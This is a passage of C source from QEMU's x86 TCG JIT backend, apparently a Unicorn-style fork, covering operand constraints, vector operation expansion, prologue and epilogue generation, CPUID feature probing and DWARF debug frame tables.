"x", "x" } }; static const TCGTargetOpDef x_x_x_x = { .args_ct_str = { "x", "x", "x", "x" } }; static const TCGTargetOpDef x_r = { .args_ct_str = { "x", "r" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st8_i64: return &qi_r; case INDEX_op_st16_i32: case INDEX_op_st16_i64: case INDEX_op_st_i32: case INDEX_op_st32_i64: return &ri_r; case INDEX_op_st_i64: return &re_r; case INDEX_op_add_i32: case INDEX_op_add_i64: return &r_r_re; case INDEX_op_sub_i32: case INDEX_op_sub_i64: case INDEX_op_mul_i32: case INDEX_op_mul_i64: case INDEX_op_or_i32: case INDEX_op_or_i64: case INDEX_op_xor_i32: case INDEX_op_xor_i64: return &r_0_re; case INDEX_op_and_i32: case INDEX_op_and_i64: { static const TCGTargetOpDef and = { .args_ct_str = { "r", "0", "reZ" } }; return ∧ } break; case INDEX_op_andc_i32: case INDEX_op_andc_i64: { static const TCGTargetOpDef andc = { .args_ct_str = { "r", "r", "rI" } }; return &andc; } break; case INDEX_op_shl_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i32: case INDEX_op_shr_i64: case INDEX_op_sar_i32: case INDEX_op_sar_i64: return have_bmi2 ? &r_r_ri : &r_0_ci; case INDEX_op_rotl_i32: case INDEX_op_rotl_i64: case INDEX_op_rotr_i32: case INDEX_op_rotr_i64: return &r_0_ci; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_re; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i32: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_neg_i32: case INDEX_op_neg_i64: case INDEX_op_not_i32: case INDEX_op_not_i64: case INDEX_op_extrh_i64_i32: return &r_0; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: return &r_q; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extract_i32: case INDEX_op_extract_i64: case INDEX_op_sextract_i32: case INDEX_op_ctpop_i32: case INDEX_op_ctpop_i64: return &r_r; case INDEX_op_extract2_i32: case INDEX_op_extract2_i64: return &r_0_r; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: { static const TCGTargetOpDef dep = { .args_ct_str = { "Q", "0", "Q" } }; return &dep; } case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: { static const TCGTargetOpDef setc = { .args_ct_str = { "q", "r", "re" } }; return &setc; } case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: { static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "re", "r", "0" } }; return &movc; } case INDEX_op_div2_i32: case INDEX_op_div2_i64: case INDEX_op_divu2_i32: case INDEX_op_divu2_i64: { static const TCGTargetOpDef div2 = { .args_ct_str = { "a", "d", "0", "1", "r" } }; return &div2; } case INDEX_op_mulu2_i32: case INDEX_op_mulu2_i64: case INDEX_op_muls2_i32: case INDEX_op_muls2_i64: { static const TCGTargetOpDef mul2 = { .args_ct_str = { "a", "d", "a", "r" } }; return &mul2; } case INDEX_op_add2_i32: case INDEX_op_add2_i64: case INDEX_op_sub2_i32: case INDEX_op_sub2_i64: { static const TCGTargetOpDef arith2 = { .args_ct_str = { "r", "r", "0", "1", "re", "re" } }; return &arith2; } case INDEX_op_ctz_i32: case INDEX_op_ctz_i64: { static const TCGTargetOpDef ctz[2] = { { .args_ct_str = { "&r", "r", "r" } }, { .args_ct_str = { "&r", "r", "rW" } }, }; return &ctz[have_bmi1]; } case INDEX_op_clz_i32: case INDEX_op_clz_i64: { static const TCGTargetOpDef clz[2] = { { .args_ct_str = { "&r", "r", "r" } }, { .args_ct_str = { "&r", "r", "rW" } }, }; return &clz[have_lzcnt]; } case INDEX_op_qemu_ld_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_L : &r_L_L; case INDEX_op_qemu_st_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &L_L : &L_L_L; case INDEX_op_qemu_ld_i64: return (TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_r_L : &r_r_L_L); case INDEX_op_qemu_st_i64: return (TCG_TARGET_REG_BITS == 64 ? &L_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &L_L_L : &L_L_L_L); case INDEX_op_brcond2_i32: { static const TCGTargetOpDef b2 = { .args_ct_str = { "r", "r", "ri", "ri" } }; return &b2; } case INDEX_op_setcond2_i32: { static const TCGTargetOpDef s2 = { .args_ct_str = { "r", "r", "r", "ri", "ri" } }; return &s2; } case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_dupm_vec: return &x_r; case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_mul_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_ssadd_vec: case INDEX_op_usadd_vec: case INDEX_op_sssub_vec: case INDEX_op_ussub_vec: case INDEX_op_smin_vec: case INDEX_op_umin_vec: case INDEX_op_smax_vec: case INDEX_op_umax_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: case INDEX_op_shls_vec: case INDEX_op_shrs_vec: case INDEX_op_sars_vec: case INDEX_op_cmp_vec: case INDEX_op_x86_shufps_vec: case INDEX_op_x86_blend_vec: case INDEX_op_x86_packss_vec: case INDEX_op_x86_packus_vec: case INDEX_op_x86_vperm2i128_vec: case INDEX_op_x86_punpckl_vec: case INDEX_op_x86_punpckh_vec: #if TCG_TARGET_REG_BITS == 32 case INDEX_op_dup2_vec: #endif return &x_x_x; case INDEX_op_abs_vec: case INDEX_op_dup_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: case INDEX_op_x86_psrldq_vec: return &x_x; case INDEX_op_x86_vpblendvb_vec: return &x_x_x_x; default: break; } return NULL; } int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece) { switch (opc) { case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: return 1; case INDEX_op_cmp_vec: case INDEX_op_cmpsel_vec: return -1; case INDEX_op_shli_vec: case INDEX_op_shri_vec: /* We must expand the operation for MO_8. */ return vece == MO_8 ? -1 : 1; case INDEX_op_sari_vec: /* We must expand the operation for MO_8. */ if (vece == MO_8) { return -1; } /* We can emulate this for MO_64, but it does not pay off unless we're producing at least 4 values. */ if (vece == MO_64) { return type >= TCG_TYPE_V256 ? -1 : 0; } return 1; case INDEX_op_shls_vec: case INDEX_op_shrs_vec: return vece >= MO_16; case INDEX_op_sars_vec: return vece >= MO_16 && vece <= MO_32; case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: return have_avx2 && vece >= MO_32; case INDEX_op_sarv_vec: return have_avx2 && vece == MO_32; case INDEX_op_mul_vec: if (vece == MO_8) { /* We can expand the operation for MO_8. */ return -1; } if (vece == MO_64) { return 0; } return 1; case INDEX_op_ssadd_vec: case INDEX_op_usadd_vec: case INDEX_op_sssub_vec: case INDEX_op_ussub_vec: return vece <= MO_16; case INDEX_op_smin_vec: case INDEX_op_smax_vec: case INDEX_op_umin_vec: case INDEX_op_umax_vec: case INDEX_op_abs_vec: return vece <= MO_32; default: return 0; } } static void expand_vec_shi(TCGContext *tcg_ctx, TCGType type, unsigned vece, bool shr, TCGv_vec v0, TCGv_vec v1, TCGArg imm) { TCGv_vec t1, t2; tcg_debug_assert(vece == MO_8); t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); /* Unpack to W, shift, and repack. Tricky bits: (1) Use punpck*bw x,x to produce DDCCBBAA, i.e. duplicate in other half of the 16-bit lane. (2) For right-shift, add 8 so that the high half of the lane becomes zero. For left-shift, we must shift up and down again. (3) Step 2 leaves high half zero such that PACKUSWB (pack with unsigned saturation) does not modify the quantity. */ vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); if (shr) { tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, imm + 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t2, t2, imm + 8); } else { tcg_gen_shli_vec(tcg_ctx, MO_16, t1, t1, imm + 8); tcg_gen_shli_vec(tcg_ctx, MO_16, t2, t2, imm + 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t2, t2, 8); } vec_gen_3(tcg_ctx, INDEX_op_x86_packus_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); } static void expand_vec_sari(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGArg imm) { TCGv_vec t1, t2; switch (vece) { case MO_8: /* Unpack to W, shift, and repack, as in expand_vec_shi. */ t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v1)); tcg_gen_sari_vec(tcg_ctx, MO_16, t1, t1, imm + 8); tcg_gen_sari_vec(tcg_ctx, MO_16, t2, t2, imm + 8); vec_gen_3(tcg_ctx, INDEX_op_x86_packss_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); break; case MO_64: if (imm <= 32) { /* * We can emulate a small sign extend by performing an arithmetic * 32-bit shift and overwriting the high half of a 64-bit logical * shift. Note that the ISA says shift of 32 is valid, but TCG * does not, so we have to bound the smaller shift -- we get the * same result in the high half either way. */ t1 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_sari_vec(tcg_ctx, MO_32, t1, v1, MIN(imm, 31)); tcg_gen_shri_vec(tcg_ctx, MO_64, v0, v1, imm); vec_gen_4(tcg_ctx, INDEX_op_x86_blend_vec, type, MO_32, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), 0xaa); tcg_temp_free_vec(tcg_ctx, t1); } else { /* Otherwise we will need to use a compare vs 0 to produce * the sign-extend, shift and merge. */ t1 = tcg_const_zeros_vec(tcg_ctx, type); tcg_gen_cmp_vec(tcg_ctx, TCG_COND_GT, MO_64, t1, t1, v1); tcg_gen_shri_vec(tcg_ctx, MO_64, v0, v1, imm); tcg_gen_shli_vec(tcg_ctx, MO_64, t1, t1, 64 - imm); tcg_gen_or_vec(tcg_ctx, MO_64, v0, v0, t1); tcg_temp_free_vec(tcg_ctx, t1); } break; default: g_assert_not_reached(); } } static void expand_vec_mul(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2) { TCGv_vec t1, t2, t3, t4; tcg_debug_assert(vece == MO_8); /* * Unpack v1 bytes to words, 0 | x. * Unpack v2 bytes to words, y | 0. * This leaves the 8-bit result, x * y, with 8 bits of right padding. * Shift logical right by 8 bits to clear the high 8 bytes before * using an unsigned saturated pack. * * The difference between the V64, V128 and V256 cases is merely how * we distribute the expansion between temporaries. */ switch (type) { case TCG_TYPE_V64: t1 = tcg_temp_new_vec(tcg_ctx, TCG_TYPE_V128); t2 = tcg_temp_new_vec(tcg_ctx, TCG_TYPE_V128); tcg_gen_dup16i_vec(tcg_ctx, t2, 0); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, TCG_TYPE_V128, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t2)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, TCG_TYPE_V128, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v2)); tcg_gen_mul_vec(tcg_ctx, MO_16, t1, t1, t2); tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, 8); vec_gen_3(tcg_ctx, INDEX_op_x86_packus_vec, TCG_TYPE_V128, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t1)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); break; case TCG_TYPE_V128: case TCG_TYPE_V256: t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); t3 = tcg_temp_new_vec(tcg_ctx, type); t4 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dup16i_vec(tcg_ctx, t4, 0); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t4)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckl_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, t4), tcgv_vec_arg(tcg_ctx, v2)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t4)); vec_gen_3(tcg_ctx, INDEX_op_x86_punpckh_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, t4), tcgv_vec_arg(tcg_ctx, t4), tcgv_vec_arg(tcg_ctx, v2)); tcg_gen_mul_vec(tcg_ctx, MO_16, t1, t1, t2); tcg_gen_mul_vec(tcg_ctx, MO_16, t3, t3, t4); tcg_gen_shri_vec(tcg_ctx, MO_16, t1, t1, 8); tcg_gen_shri_vec(tcg_ctx, MO_16, t3, t3, 8); vec_gen_3(tcg_ctx, INDEX_op_x86_packus_vec, type, MO_8, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t3)); tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); tcg_temp_free_vec(tcg_ctx, t3); tcg_temp_free_vec(tcg_ctx, t4); break; default: g_assert_not_reached(); } } static bool expand_vec_cmp_noinv(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2, TCGCond cond) { enum { NEED_INV = 1, NEED_SWAP = 2, NEED_BIAS = 4, NEED_UMIN = 8, NEED_UMAX = 16, }; TCGv_vec t1, t2; uint8_t fixup = 0; switch (cond) { case TCG_COND_EQ: case TCG_COND_GT: fixup = 0; break; case TCG_COND_NE: case TCG_COND_LE: fixup = NEED_INV; break; case TCG_COND_LT: fixup = NEED_SWAP; break; case TCG_COND_GE: fixup = NEED_SWAP | NEED_INV; break; case TCG_COND_LEU: if (vece <= MO_32) { fixup = NEED_UMIN; } else { fixup = NEED_BIAS | NEED_INV; } break; case TCG_COND_GTU: if (vece <= MO_32) { fixup = NEED_UMIN | NEED_INV; } else { fixup = NEED_BIAS; } break; case TCG_COND_GEU: if (vece <= MO_32) { fixup = NEED_UMAX; } else { fixup = NEED_BIAS | NEED_SWAP | NEED_INV; } break; case TCG_COND_LTU: if (vece <= MO_32) { fixup = NEED_UMAX | NEED_INV; } else { fixup = NEED_BIAS | NEED_SWAP; } break; default: g_assert_not_reached(); } if (fixup & NEED_INV) { cond = tcg_invert_cond(cond); } if (fixup & NEED_SWAP) { t1 = v1, v1 = v2, v2 = t1; cond = tcg_swap_cond(cond); } t1 = t2 = NULL; if (fixup & (NEED_UMIN | NEED_UMAX)) { t1 = tcg_temp_new_vec(tcg_ctx, type); if (fixup & NEED_UMIN) { tcg_gen_umin_vec(tcg_ctx, vece, t1, v1, v2); } else { tcg_gen_umax_vec(tcg_ctx, vece, t1, v1, v2); } v2 = t1; cond = TCG_COND_EQ; } else if (fixup & NEED_BIAS) { t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dupi_vec(tcg_ctx, vece, t2, 1ull << ((8 << vece) - 1)); tcg_gen_sub_vec(tcg_ctx, vece, t1, v1, t2); tcg_gen_sub_vec(tcg_ctx, vece, t2, v2, t2); v1 = t1; v2 = t2; cond = tcg_signed_cond(cond); } tcg_debug_assert(cond == TCG_COND_EQ || cond == TCG_COND_GT); /* Expand directly; do not recurse. */ vec_gen_4(tcg_ctx, INDEX_op_cmp_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2), cond); if (t1) { tcg_temp_free_vec(tcg_ctx, t1); if (t2) { tcg_temp_free_vec(tcg_ctx, t2); } } return fixup & NEED_INV; } static void expand_vec_cmp(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2, TCGCond cond) { if (expand_vec_cmp_noinv(tcg_ctx, type, vece, v0, v1, v2, cond)) { tcg_gen_not_vec(tcg_ctx, vece, v0, v0); } } static void expand_vec_cmpsel(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec c1, TCGv_vec c2, TCGv_vec v3, TCGv_vec v4, TCGCond cond) { TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); if (expand_vec_cmp_noinv(tcg_ctx, type, vece, t, c1, c2, cond)) { /* Invert the sense of the compare by swapping arguments. */ TCGv_vec x; x = v3, v3 = v4, v4 = x; } vec_gen_4(tcg_ctx, INDEX_op_x86_vpblendvb_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v4), tcgv_vec_arg(tcg_ctx, v3), tcgv_vec_arg(tcg_ctx, t)); tcg_temp_free_vec(tcg_ctx, t); } void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg a0, ...) { va_list va; TCGArg a2; TCGv_vec v0, v1, v2, v3, v4; va_start(va, a0); v0 = temp_tcgv_vec(tcg_ctx, arg_temp(a0)); v1 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); a2 = va_arg(va, TCGArg); switch (opc) { case INDEX_op_shli_vec: case INDEX_op_shri_vec: expand_vec_shi(tcg_ctx, type, vece, opc == INDEX_op_shri_vec, v0, v1, a2); break; case INDEX_op_sari_vec: expand_vec_sari(tcg_ctx, type, vece, v0, v1, a2); break; case INDEX_op_mul_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_mul(tcg_ctx, type, vece, v0, v1, v2); break; case INDEX_op_cmp_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_cmp(tcg_ctx, type, vece, v0, v1, v2, va_arg(va, TCGArg)); break; case INDEX_op_cmpsel_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); v3 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); v4 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); expand_vec_cmpsel(tcg_ctx, type, vece, v0, v1, v2, v3, v4, va_arg(va, TCGArg)); break; default: break; } va_end(va); } static const int tcg_target_callee_save_regs[] = { #if TCG_TARGET_REG_BITS == 64 TCG_REG_RBP, TCG_REG_RBX, #if defined(_WIN64) TCG_REG_RDI, TCG_REG_RSI, #endif TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, /* Currently used for the global env. */ TCG_REG_R15, #else TCG_REG_EBP, /* Currently used for the global env. */ TCG_REG_EBX, TCG_REG_ESI, TCG_REG_EDI, #endif }; /* Compute frame size via macros, to share between tcg_target_qemu_prologue and tcg_register_jit. */ #define PUSH_SIZE \ ((1 + ARRAY_SIZE(tcg_target_callee_save_regs)) \ * (TCG_TARGET_REG_BITS / 8)) #define FRAME_SIZE \ ((PUSH_SIZE \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + TCG_TARGET_STACK_ALIGN - 1) \ & ~(TCG_TARGET_STACK_ALIGN - 1)) /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int i, stack_addend; /* TB prologue */ /* Reserve some stack space, also for TCG temps. */ stack_addend = FRAME_SIZE - PUSH_SIZE; tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, CPU_TEMP_BUF_NLONGS * sizeof(long)); /* Save all callee saved registers. */ for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_push(s, tcg_target_callee_save_regs[i]); } #if TCG_TARGET_REG_BITS == 32 tcg_out_ld(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, (ARRAY_SIZE(tcg_target_callee_save_regs) + 1) * 4); tcg_out_addi(s, TCG_REG_ESP, -stack_addend); /* jmp *tb. */ tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, TCG_REG_ESP, (ARRAY_SIZE(tcg_target_callee_save_regs) + 2) * 4 + stack_addend); #else tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_addi(s, TCG_REG_ESP, -stack_addend); /* jmp *tb. */ tcg_out_modrm(s, OPC_GRP5, EXT5_JMPN_Ev, tcg_target_call_iarg_regs[1]); #endif /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_REG, TCG_REG_EAX, 0); /* TB epilogue */ s->tb_ret_addr = s->code_ptr; tcg_out_addi(s, TCG_REG_CALL_STACK, stack_addend); if (have_avx2) { tcg_out_vex_opc(s, OPC_VZEROUPPER, 0, 0, 0, 0); } for (i = ARRAY_SIZE(tcg_target_callee_save_regs) - 1; i >= 0; i--) { tcg_out_pop(s, tcg_target_callee_save_regs[i]); } tcg_out_opc(s, OPC_RET, 0, 0, 0); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { memset(p, 0x90, count); } static void tcg_target_init(TCGContext *s) { #ifdef CONFIG_CPUID_H unsigned a, b, c, d, b7 = 0; int max; #ifdef _MSC_VER int cpu_info[4]; __cpuid(cpu_info, 0); max = cpu_info[0]; #else max = __get_cpuid_max(0, 0); #endif if (max >= 7) { /* BMI1 is available on AMD Piledriver and Intel Haswell CPUs. */ #ifdef _MSC_VER __cpuid(cpu_info, 7); a = cpu_info[0]; b7 = cpu_info[1]; c = cpu_info[2]; d = cpu_info[3]; #else __cpuid_count(7, 0, a, b7, c, d); #endif have_bmi1 = (b7 & bit_BMI) != 0; have_bmi2 = (b7 & bit_BMI2) != 0; } if (max >= 1) { #ifdef _MSC_VER __cpuid(cpu_info, 1); a = cpu_info[0]; b = cpu_info[1]; c = cpu_info[2]; d = cpu_info[3]; #else __cpuid(1, a, b, c, d); #endif #ifndef have_cmov /* For 32-bit, 99% certainty that we're running on hardware that supports cmov, but we still need to check. In case cmov is not available, we'll use a small forward branch. */ have_cmov = (d & bit_CMOV) != 0; #endif /* MOVBE is only available on Intel Atom and Haswell CPUs, so we need to probe for it. */ have_movbe = (c & bit_MOVBE) != 0; have_popcnt = (c & bit_POPCNT) != 0; /* There are a number of things we must check before we can be sure of not hitting invalid opcode. */ if (c & bit_OSXSAVE) { unsigned xcrl, xcrh; /* The xgetbv instruction is not available to older versions of * the assembler, so we encode the instruction manually. */ #ifndef _MSC_VER asm(".byte 0x0f, 0x01, 0xd0" : "=a" (xcrl), "=d" (xcrh) : "c" (0)); #else unsigned long long bv = _xgetbv(0); xcrl = bv & 0xFFFFFFFF; xcrh = (bv >> 32) & 0xFFFFFFFF; #endif if ((xcrl & 6) == 6) { have_avx1 = (c & bit_AVX) != 0; have_avx2 = (b7 & bit_AVX2) != 0; } } } #ifdef _MSC_VER __cpuid(cpu_info, 0x80000000); max = cpu_info[0]; #else max = __get_cpuid_max(0x8000000, 0); #endif if (max >= 1) { #ifdef _MSC_VER __cpuid(cpu_info, 0x80000001); a = cpu_info[0]; b = cpu_info[1]; c = cpu_info[2]; d = cpu_info[3]; #else __cpuid(0x80000001, a, b, c, d); #endif /* LZCNT was introduced with AMD Barcelona and Intel Haswell CPUs. */ have_lzcnt = (c & bit_LZCNT) != 0; } #endif /* CONFIG_CPUID_H */ s->tcg_target_available_regs[TCG_TYPE_I32] = ALL_GENERAL_REGS; if (TCG_TARGET_REG_BITS == 64) { s->tcg_target_available_regs[TCG_TYPE_I64] = ALL_GENERAL_REGS; } if (have_avx1) { s->tcg_target_available_regs[TCG_TYPE_V64] = ALL_VECTOR_REGS; s->tcg_target_available_regs[TCG_TYPE_V128] = ALL_VECTOR_REGS; } if (have_avx2) { s->tcg_target_available_regs[TCG_TYPE_V256] = ALL_VECTOR_REGS; } s->tcg_target_call_clobber_regs = ALL_VECTOR_REGS; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EAX); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EDX); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_ECX); if (TCG_TARGET_REG_BITS == 64) { #if !defined(_WIN64) tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RDI); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RSI); #endif tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); } s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[14]; } DebugFrame; /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); #if !defined(__ELF__) /* Host machine without ELF. */ #elif TCG_TARGET_REG_BITS == 64 #define ELF_HOST_MACHINE EM_X86_64 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x78, /* sleb128 -8 */ .h.cie.return_column = 16, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, 7, /* DW_CFA_def_cfa %rsp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x90, 1, /* DW_CFA_offset, %rip, -8 */ /* The following ordering must match tcg_target_callee_save_regs. */ 0x86, 2, /* DW_CFA_offset, %rbp, -16 */ 0x83, 3, /* DW_CFA_offset, %rbx, -24 */ 0x8c, 4, /* DW_CFA_offset, %r12, -32 */ 0x8d, 5, /* DW_CFA_offset, %r13, -40 */ 0x8e, 6, /* DW_CFA_offset, %r14, -48 */ 0x8f, 7, /* DW_CFA_offset, %r15, -56 */ } }; #else #define ELF_HOST_MACHINE EM_386 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x7c, /* sleb128 -4 */ .h.cie.return_column = 8, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, 4, /* DW_CFA_def_cfa %esp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x88, 1, /* DW_CFA_offset, %eip, -4 */ /* The following ordering must match tcg_target_callee_save_regs. */ 0x85, 